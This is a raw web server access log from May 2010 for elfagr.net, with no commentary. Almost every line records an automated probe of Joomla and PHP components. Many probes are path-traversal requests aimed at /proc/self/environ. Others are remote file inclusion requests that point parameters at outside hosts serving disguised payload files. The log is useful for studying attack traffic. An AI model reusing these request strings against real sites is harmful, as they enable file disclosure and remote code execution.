99.39.2.249 - - [06/May/2010:17:58:52 -0700] "GET /logs/access.log/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:17:58:53 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:17:58:54 -0700] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
211.39.130.176 - - [06/May/2010:17:59:22 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
211.39.130.176 - - [06/May/2010:17:59:14 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
211.39.130.176 - - [06/May/2010:17:59:23 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
211.39.130.176 - - [06/May/2010:17:59:59 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
99.39.2.249 - - [06/May/2010:18:00:06 -0700] "GET /logs/access.log/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:18:00:07 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:18:00:08 -0700] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
211.39.130.176 - - [06/May/2010:18:00:15 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
91.121.30.111 - - [06/May/2010:18:06:14 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.30.111 - - [06/May/2010:18:07:25 -0700] "GET /logs/access.log//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.30.111 - - [06/May/2010:18:07:16 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.30.111 - - [06/May/2010:18:07:16 -0700] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
211.39.130.176 - - [06/May/2010:18:11:10 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
211.39.130.176 - - [06/May/2010:18:11:02 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
211.39.130.176 - - [06/May/2010:18:11:03 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "elfagr.net"
217.16.18.219 - - [06/May/2010:18:12:24 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
91.121.30.111 - - [06/May/2010:18:12:52 -0700] "GET /logs/access.log//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.30.111 - - [06/May/2010:18:12:44 -0700] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
91.121.30.111 - - [06/May/2010:18:12:53 -0700] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
217.16.18.219 - - [06/May/2010:18:14:22 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:18:28:41 -0700] "GET /logs/access.log/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:18:28:41 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:18:28:41 -0700] "GET /logs/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
213.91.132.141 - - [06/May/2010:18:29:14 -0700] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
115.89.243.90 - - [06/May/2010:18:29:50 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cliverichardsphotography.co.uk//components/com_spgm/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
115.89.243.90 - - [06/May/2010:18:29:59 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cliverichardsphotography.co.uk//components/com_spgm/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
115.89.243.90 - - [06/May/2010:18:30:08 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cliverichardsphotography.co.uk//components/com_spgm/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
93.158.149.32 - - [06/May/2010:18:33:44 -0700] "GET /logs/access_091210.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
213.91.132.141 - - [06/May/2010:18:38:12 -0700] "GET /logs/access.log///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
213.91.132.141 - - [06/May/2010:18:38:21 -0700] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
213.91.132.141 - - [06/May/2010:18:38:13 -0700] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
64.32.22.130 - - [06/May/2010:18:40:26 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
64.32.22.130 - - [06/May/2010:18:40:35 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
64.32.22.130 - - [06/May/2010:18:40:27 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
217.16.18.219 - - [06/May/2010:18:40:34 -0700] "GET /logs/access.log/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:18:40:34 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:18:40:34 -0700] "GET /logs/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
64.32.22.130 - - [06/May/2010:18:43:51 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
64.32.22.130 - - [06/May/2010:18:44:00 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
64.32.22.130 - - [06/May/2010:18:43:52 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
213.91.132.141 - - [06/May/2010:18:45:56 -0700] "GET /logs/access.log///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
213.91.132.141 - - [06/May/2010:18:45:56 -0700] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
213.91.132.141 - - [06/May/2010:18:45:57 -0700] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "elfagr.net"
64.32.22.130 - - [06/May/2010:18:49:29 -0700] "GET /?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1465 "-" "oi" "elfagr.net"
64.32.22.130 - - [06/May/2010:18:49:21 -0700] "GET /logs/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5085 "-" "oi" "elfagr.net"
64.32.22.130 - - [06/May/2010:18:49:21 -0700] "GET /logs/access.log/?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "elfagr.net"
99.39.2.249 - - [06/May/2010:18:54:40 -0700] "GET /logs/access.log/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:18:54:31 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:18:54:41 -0700] "GET /logs/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:18:54:46 -0700] "GET /logs/access.log/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:18:54:47 -0700] "GET /index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
99.39.2.249 - - [06/May/2010:18:54:38 -0700] "GET /logs/index.php?option=com_sitemap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
62.140.247.10 - - [06/May/2010:19:02:52 -0700] "GET /login.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:19:02:52 -0700] "GET /logs/access.log%20%20//login.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:19:02:52 -0700] "GET /logs//login.php?dir=http://tjdhosp.co.kr/data/session/byz9991.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
216.65.3.71 - - [06/May/2010:19:07:17 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bbworlds.com/userfiles/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
216.65.3.71 - - [06/May/2010:19:07:09 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bbworlds.com/userfiles/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
216.65.3.71 - - [06/May/2010:19:07:09 -0700] "GET /logs/access.log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bbworlds.com/userfiles/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:19:11:23 -0700] "GET /login.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:19:11:23 -0700] "GET /logs//login.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
62.140.247.10 - - [06/May/2010:19:11:23 -0700] "GET /logs/access.log%20%20//login.php?dir=http://www.sehoworld.com.tw/ind/uploads/id.gif? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
111.89.128.186 - - [06/May/2010:19:12:26 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
111.89.128.186 - - [06/May/2010:19:12:26 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://lkas.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
216.65.3.71 - - [06/May/2010:19:13:08 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://bbworlds.com/userfiles/id2.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
121.254.228.21 - - [06/May/2010:19:18:35 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
121.254.228.21 - - [06/May/2010:19:18:35 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
121.254.228.21 - - [06/May/2010:19:18:35 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
121.254.228.21 - - [06/May/2010:19:19:02 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
121.254.228.21 - - [06/May/2010:19:18:54 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
121.254.228.21 - - [06/May/2010:19:19:03 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
212.47.221.153 - - [06/May/2010:19:23:23 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "elfagr.net"
93.158.149.32 - - [06/May/2010:19:30:24 -0700] "GET /robots.txt HTTP/1.1" 200 37 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.elfagr.net"
83.69.115.198 - - [06/May/2010:19:30:42 -0700] "GET ///index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
212.47.221.153 - - [06/May/2010:19:32:17 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "elfagr.net"
212.47.221.153 - - [06/May/2010:19:32:09 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "elfagr.net"
212.47.221.153 - - [06/May/2010:19:32:09 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "elfagr.net"
83.69.115.198 - - [06/May/2010:19:37:21 -0700] "GET /logs/access.log////index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
83.69.115.198 - - [06/May/2010:19:37:30 -0700] "GET ///index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
83.69.115.198 - - [06/May/2010:19:37:31 -0700] "GET /logs////index.php?option=com_news_portal&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
212.47.221.153 - - [06/May/2010:19:38:23 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "elfagr.net"
212.47.221.153 - - [06/May/2010:19:38:23 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "elfagr.net"
212.47.221.153 - - [06/May/2010:19:38:23 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.812" "elfagr.net"
174.37.143.198 - - [06/May/2010:19:43:12 -0700] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.37.143.198 - - [06/May/2010:19:43:12 -0700] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.37.143.198 - - [06/May/2010:19:43:20 -0700] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.16.18.219 - - [06/May/2010:19:43:27 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:19:44:18 -0700] "GET /logs/access.log/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:19:44:18 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:19:44:18 -0700] "GET /logs/index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
217.16.18.219 - - [06/May/2010:19:44:30 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
83.69.115.198 - - [06/May/2010:19:45:11 -0700] "GET /logs/access_091126.log////index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
83.69.115.198 - - [06/May/2010:19:45:11 -0700] "GET ///index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
83.69.115.198 - - [06/May/2010:19:45:12 -0700] "GET /logs////index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
174.37.143.198 - - [06/May/2010:19:45:28 -0700] "GET /logs/access.log//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.37.143.198 - - [06/May/2010:19:45:28 -0700] "GET /logs//index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.37.143.198 - - [06/May/2010:19:45:28 -0700] "GET /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.37.143.198 - - [06/May/2010:19:47:27 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.37.143.198 - - [06/May/2010:19:47:36 -0700] "GET /logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.37.143.198 - - [06/May/2010:19:47:27 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.37.143.198 - - [06/May/2010:19:47:28 -0700] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.37.143.198 - - [06/May/2010:19:47:28 -0700] "GET /logs/access.log/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
174.37.143.198 - - [06/May/2010:19:47:28 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
217.16.18.219 - - [06/May/2010:19:48:07 -0700] "GET /index.php?option=module&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
74.54.22.2 - - [06/May/2010:19:48:29 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://wanso.ssu.ac.kr/zboard/admin/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
74.54.22.2 - - [06/May/2010:19:48:29 -0700] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://wanso.ssu.ac.kr/zboard/admin/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
74.54.22.2 - - [06/May/2010:19:48:30 -0700] "GET /logs/access.log%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://wanso.ssu.ac.kr/zboard/admin/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
